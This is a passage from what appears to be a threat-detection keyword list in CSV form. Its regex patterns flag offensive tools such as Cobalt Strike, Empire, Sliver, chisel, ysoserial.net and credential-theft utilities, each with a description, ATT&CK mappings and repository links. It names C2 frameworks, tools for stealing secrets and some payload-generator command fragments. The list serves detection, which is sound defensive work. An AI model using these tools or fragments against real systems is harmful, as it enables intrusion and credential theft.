TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*exports --dll *.dll --prototypes ./Assets/prototypes.csv*",".{0,1000}exports\s\-\-dll\s.{0,1000}\.dll\s\-\-prototypes\s\.\/Assets\/prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*exposed_get_password*",".{0,1000}exposed_get_password.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*exrienz/DirtyCow*",".{0,1000}exrienz\/DirtyCow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","1","N/A","N/A","1","29","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" "*extensions/sniffer*",".{0,1000}extensions\/sniffer.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ExtensionSpoof.vbproj*",".{0,1000}ExtensionSpoof\.vbproj.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*ExtensionSpoof.xml*",".{0,1000}ExtensionSpoof\.xml.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*ExtensionSpoofer-1.zip*",".{0,1000}ExtensionSpoofer\-1\.zip.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*external_c2.cna*",".{0,1000}external_c2\.cna.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.*",".{0,1000}ExternalC2\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.dll*",".{0,1000}ExternalC2\.dll.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.Net*",".{0,1000}ExternalC2\.Net.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*ExternalC2.Net.*",".{0,1000}ExternalC2\.Net\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*externalc2.py*",".{0,1000}externalc2\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*ExternalC2\*",".{0,1000}ExternalC2\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*externalc2_start*",".{0,1000}externalc2_start.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Core*",".{0,1000}ExternalC2Core.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2-master*",".{0,1000}ExternalC2\-master.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Tests*",".{0,1000}ExternalC2Tests.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Web*",".{0,1000}ExternalC2Web.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalRecon.ps1*",".{0,1000}ExternalRecon\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*extract_cmd_exec*.js*",".{0,1000}extract_cmd_exec.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*extract_cmd_exec*.rb*",".{0,1000}extract_cmd_exec.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*extract_reflective_loader*",".{0,1000}extract_reflective_loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ExtractBitLockerKeys*@podalirius_*",".{0,1000}ExtractBitLockerKeys.{0,1000}\@podalirius_.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*ExtractBitlockerKeys.ps1*",".{0,1000}ExtractBitlockerKeys\.ps1.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*ExtractBitlockerKeys.py*",".{0,1000}ExtractBitlockerKeys\.py.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*ExtractBitlockerKeys-main*",".{0,1000}ExtractBitlockerKeys\-main.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*ExtractDataXML_BruteForce*",".{0,1000}ExtractDataXML_BruteForce.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Extract-HijackableKeysFromProcmonCSV*",".{0,1000}Extract\-HijackableKeysFromProcmonCSV.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*extracttgsrepfrompcap.py*",".{0,1000}extracttgsrepfrompcap\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*extra-scripts*timecrack.py*",".{0,1000}extra\-scripts.{0,1000}timecrack\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","167","17","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*eyewitness -f urls.txt --web*",".{0,1000}eyewitness\s\-f\surls\.txt\s\-\-web.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-f BinaryFormatter -g PSObject -o base64 -c *",".{0,1000}\-f\sBinaryFormatter\s\-g\sPSObject\s\-o\sbase64\s\-c\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*-f Json.Net -g ObjectDataProvider -o raw -c *",".{0,1000}\-f\sJson\.Net\s\-g\sObjectDataProvider\s\-o\sraw\s\-c\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*-f payloads_examples/calc.*",".{0,1000}\-f\spayloads_examples\/calc\..{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*f0037d99bc3119fc613d304af20599e8c791b1c99208d5d452a01738777f7b49*",".{0,1000}f0037d99bc3119fc613d304af20599e8c791b1c99208d5d452a01738777f7b49.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*F00A3B5F-D9A9-4582-BBCE-FD10EFBF0C17*",".{0,1000}F00A3B5F\-D9A9\-4582\-BBCE\-FD10EFBF0C17.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*F06EAC7B-6996-4E78-B045-0DF6ED201367*",".{0,1000}F06EAC7B\-6996\-4E78\-B045\-0DF6ED201367.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88*",".{0,1000}f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*f140d5c67e7a151d9bba6d8c456dd44004f14056acd3257aa2203b30e959ef39*",".{0,1000}f140d5c67e7a151d9bba6d8c456dd44004f14056acd3257aa2203b30e959ef39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*",".{0,1000}F1527C49\-CA1F\-4994\-BB9D\-E20DD2C607FD.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*",".{0,1000}F1527C49\-CA1F\-4994\-BB9D\-E20DD2C607FD.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*f15785e3f3b824872a6b9dd8c550886179d3e636f0f1939d2b45c411701c72f8*",".{0,1000}f15785e3f3b824872a6b9dd8c550886179d3e636f0f1939d2b45c411701c72f8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f15f6182ca98bb702c2578efc0aef6e35d8237b89a00a588364bb7e068b132fa*",".{0,1000}f15f6182ca98bb702c2578efc0aef6e35d8237b89a00a588364bb7e068b132fa.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*F1653F20-D47D-4F29-8C55-3C835542AF5F*",".{0,1000}F1653F20\-D47D\-4F29\-8C55\-3C835542AF5F.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*f187ab7396fc3a96e9549316af3e8eaf9ecdca41adec82d98ca52e67974811a8*",".{0,1000}f187ab7396fc3a96e9549316af3e8eaf9ecdca41adec82d98ca52e67974811a8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f19bd04ee2c9271e758bc21fc681f0a08ebf441a70b3221ccf5d201d5ae70f9b*",".{0,1000}f19bd04ee2c9271e758bc21fc681f0a08ebf441a70b3221ccf5d201d5ae70f9b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f1a21c50b4c315780c16c0777f84b5fa407a98acc014cf68ff05e3c007ce2f0c*",".{0,1000}f1a21c50b4c315780c16c0777f84b5fa407a98acc014cf68ff05e3c007ce2f0c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f1bdbea3a5f869e83b52e6284e24d76049a3505492a8b7176cb07f2ad03cbe2b*",".{0,1000}f1bdbea3a5f869e83b52e6284e24d76049a3505492a8b7176cb07f2ad03cbe2b.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*f1c6a2f008eb7888b5b081a834088a4a1b6fd688db3c99c89541d673489ae130*",".{0,1000}f1c6a2f008eb7888b5b081a834088a4a1b6fd688db3c99c89541d673489ae130.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 